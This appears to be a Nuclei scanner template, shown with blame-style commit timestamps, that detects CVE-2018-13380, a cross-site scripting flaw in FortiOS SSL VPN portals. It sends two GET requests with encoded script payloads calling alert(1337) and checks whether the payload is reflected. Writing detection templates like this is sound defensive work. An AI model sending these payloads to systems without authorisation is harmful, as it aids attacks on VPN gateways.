2021-01-02 05:00:39 +00:00
id : CVE-2018-13380
2020-11-24 14:30:18 +00:00
info :
name : Fortinet FortiOS Cross-Site Scripting
author : shelld3v
severity : medium
2020-11-24 20:00:01 +00:00
description : A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
type : XSS
reference : https://nvd.nist.gov/vuln/detail/CVE-2018-13380
2021-02-05 19:44:41 +00:00
tags : cve,cve2018,fortios,xss
2020-11-24 14:30:18 +00:00
requests :
- method : GET
path :
2021-02-17 14:44:40 +00:00
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
2021-06-29 02:17:42 +00:00
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
2020-11-24 20:00:01 +00:00
matchers-condition : and
2020-11-24 14:30:18 +00:00
matchers :
- type : word
words :
- "<svg/onload=alert(1337)>"
part : body
2020-11-24 20:00:01 +00:00
- type : word
words :
- "application/json"
part : header
negative : true
- type : status
status :
2021-02-17 14:44:40 +00:00
- 200